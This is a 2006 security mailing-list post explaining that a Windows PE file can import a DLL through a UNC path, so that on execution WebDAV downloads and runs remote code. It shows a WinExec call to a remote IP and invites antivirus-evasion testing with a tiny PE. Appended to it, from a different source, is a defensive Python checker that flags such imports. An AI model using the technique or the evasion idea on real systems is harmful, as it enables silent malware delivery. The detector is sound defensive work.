Dailydave mailing list archives
UNC imports in PE files
From: Solar Eclipse <solareclipse () phreedom org>
Date: Tue, 7 Nov 2006 02:59:10 -0800
Hello list,

Most of you probably know that the WebDAV redirector in Windows XP tries to resolve UNC paths from all applications with WebDAV requests on port 80. This means that instead of calling URLDownloadToFile("http://192.168.0.1/foo.exe") and then WinExec, you can do just WinExec("\\192.168.0.1\foo.exe").

What you probably don't know is that you can use a full UNC path instead of a DLL name in the import section of a PE file. When the file is executed, the loader will try to access the imported DLL using the UNC path and the WebDAV redirector will download the DLL from the Internet.

It is getting increasingly harder to draw (and defend) the boundaries between the local machine, the local network and the Internet.

Check out http://www.phreedom.org/solar/code/tinype/ for the source code of a 137 byte PE file that downloads a DLL over WebDAV and executes the payload in its DllMain function. The PE file doesn't even have to contain any code, because DllMain is executed before the entry point of the executable.

The page also has detailed information about hacking the PE header and building the smallest possible PE file that can be executed on Windows. Its size is only 97 bytes.

If anybody is really bored, feel free to check how many anti-virus products have PE parsers that don't handle the header of the 97 byte PE file properly and fail to unpack and scan the code in the file.

Good night and good luck,
Solar Eclipse
_______________________________________________ Dailydave mailing list Dailydave () lists immunitysec com http://lists.immunitysec.com/mailman/listinfo/dailydave
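As a defender's check for the technique described in this post, here is an added Python example (not from the post, the list, or phreedom.org) that walks a PE file's import directory and flags any imported "DLL name" that is actually a path, UNC or otherwise, since a legitimate import is a bare file name. The `build_sample_pe` helper constructs a minimal PE32 as test input, and all function names here are my own.

```python
import struct

def _rva_to_offset(rva, sections):
    # A PE with no section table is mapped 1:1 by Windows, so there RVA == file offset.
    for vsize, va, raw_size, raw_ptr in sections:
        if va <= rva < va + max(vsize, raw_size):
            return rva - va + raw_ptr
    if not sections:
        return rva
    raise ValueError(f"RVA {rva:#x} outside every section")

def imported_dll_names(pe):
    """Walk the import directory of a PE32 / PE32+ image and return its DLL name strings."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[:2] != b"MZ" or pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff = e_lfanew + 4
    nsec, opt_size = struct.unpack_from("<H", pe, coff + 2)[0], struct.unpack_from("<H", pe, coff + 16)[0]
    opt = coff + 20
    pe32 = struct.unpack_from("<H", pe, opt)[0] == 0x10B            # else PE32+ (0x20B)
    imp_rva = struct.unpack_from("<I", pe, opt + (96 if pe32 else 112) + 8)[0]  # DataDirectory[1]
    if imp_rva == 0:
        return []                                                  # no import table
    sections = [struct.unpack_from("<IIII", pe, opt + opt_size + i * 40 + 8) for i in range(nsec)]
    names, off = [], _rva_to_offset(imp_rva, sections)
    while pe[off:off + 20] != bytes(20):                           # all-zero descriptor ends the table
        name_off = _rva_to_offset(struct.unpack_from("<I", pe, off + 12)[0], sections)
        names.append(pe[name_off:pe.index(b"\0", name_off)].decode("latin-1"))
        off += 20
    return names

def path_like_imports(pe):
    """A legitimate import is a bare file name; a UNC path or any separator means a remote/absolute load."""
    return [n for n in imported_dll_names(pe) if "\\" in n or "/" in n or ":" in n]

def build_sample_pe(dll_names):
    """Constructed test input, not a real sample: a minimal PE32 with one .idata section."""
    sec_va, sec_raw = 0x1000, 0x200
    desc, names = bytearray(), bytearray()
    names_rva = sec_va + 20 * (len(dll_names) + 1)                # names follow the descriptor array
    for dll in dll_names:
        desc += struct.pack("<IIIII", 0, 0, 0, names_rva + len(names), 0)   # IMAGE_IMPORT_DESCRIPTOR.Name
        names += dll.encode() + b"\0"
    data = bytes(desc) + bytes(20) + bytes(names)
    dos = b"MZ" + bytes(0x3A) + struct.pack("<I", 0x40)            # e_lfanew -> 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x102)
    # Optional header: magic, NumberOfRvaAndSizes=16 at 92, empty export dir, import dir at 104
    opt = (struct.pack("<H", 0x10B).ljust(92, b"\0") + struct.pack("<IQII", 16, 0, sec_va, len(desc) + 20)).ljust(224, b"\0")
    sec = b".idata\0\0" + struct.pack("<IIIIIIHHI", len(data), sec_va, len(data), sec_raw, 0, 0, 0, 0, 0x40000040)
    return (dos + coff + opt + sec).ljust(sec_raw, b"\0") + data
```

Run `path_like_imports(open("sample.exe", "rb").read())` on a real file; a non-empty result is worth a second look before the file is ever executed.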